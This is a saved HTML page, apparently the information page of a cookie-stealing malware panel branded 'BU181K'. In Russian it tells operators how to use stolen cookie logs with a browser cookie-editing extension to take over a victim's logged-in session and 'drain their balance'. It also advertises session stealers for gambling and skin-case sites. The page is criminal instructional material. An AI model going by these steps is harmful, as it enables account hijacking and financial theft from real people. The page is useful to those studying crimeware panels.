<!DOCTYPE html>
<!-- saved from url=(0033)http://a0149298.xsph.ru/table.php -->
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="Content-Security-Policy" content="default-src *; style-src * 'unsafe-inline'; script-src * 'unsafe-inline' 'unsafe-eval'; img-src * data: 'unsafe-inline'; connect-src * 'unsafe-inline'; frame-src *;">
       
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
    <title>bu181k cookies</title>

    <!-- Bootstrap -->

    <link href="./style_table.css" rel="stylesheet">
    <link href="./bootstrap.css" rel="stylesheet">
    <link href="./bootstrap-theme.css" rel="stylesheet">
    
    <script src="./jquery.min.js"></script>
    <!-- Include all compiled plugins (below), or include individual files as needed -->

    <script src="./bootstrap.js"></script>
  </head>
    <body>
        <nav class="navbar navbar-inverse">        
            <div class="container-fluid">
                <div class="navbar-header">
                <a class="navbar-brand" href="
                /admin/admin.php" style="text-shadow: #8A2BE2 1px 1px 10px;font-weight: bold;">BU181K</a></div>
                <ul class="nav navbar-nav">
                <li class="active"><a href="
                /admin/admin.php">logs</a></li>
                 <li class="active"><a href="
                /admin/info.html">info</a></li>
                </ul>
            </div>
        </nav>
        <div class="other">
        <div class="container">
            <style>button.button {
                    color: aqua;
    margin-right: 50%;
    margin-left: 48%;
    width: 100px;
    height: 30px;
    margin-top: 20px;
    border-radius: 20px;
    background-color: rgba(152, 46, 164, 0.78);
    /* color: aqua; */
}
.tea{
    height: 400px;
}
@media (min-width: 992px) {
  .container {
          
   height: 500px;
    overflow: auto;
    width: 970px;
  }
}
.tea{
    text-align:center;
}
p{
    font-size:15px; 
}
a {
  color: #1af9ff;
  text-decoration: none;
}
.container {
          
 background-color: rgba(153, 42, 165, 0.47);
  }</style>
                   
        <div class="tea">
    <h4>INFO BLEAT</h4><h5>(есть возможность сделать стиллер сессии для всего (где это возможно)/рулетки/кейсы/коины/etc...) </h5><p>1. Для того чтоб зайти на чужую сессию понадобяться логи и расширение хром <span><a href="https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg&quot;"> EditThisCookies</a></span></p><p>2.Заходим на свой аккаунт (или создаем новые куки с названием/значением/параметром как в оригинальной сесии) на сайте </p><p>3.Меняем значения (смотрим чтоб названия куков совпадали) на свои и перезагружаем страницу</p><p>4.PROFIT! Мы на сессии жертвы и можем сливать его баланс </p><h6>(инфо как и куки/возможности будут пополняться (не пизди на дизайн панели он тут играет вторичную роль).Все идеи и дополнения озвучивайте мне в скайп (все фиксанем/добавим).</h6>
</div>
          
                    
                         
                           
                            
                                            
          
        </div>

        
 
 </div>
        <nav class="navbar navbar-inverse navbar-fixed-bottom" style="opacity: 0.7">        
            <div class="container-fluid">
                <div class="navbar-header">
               <a class="navbar-brand" >Bulbik (rak_raklo)</a>
                </div>
                
            </div>
        </nav>
    
</body></html>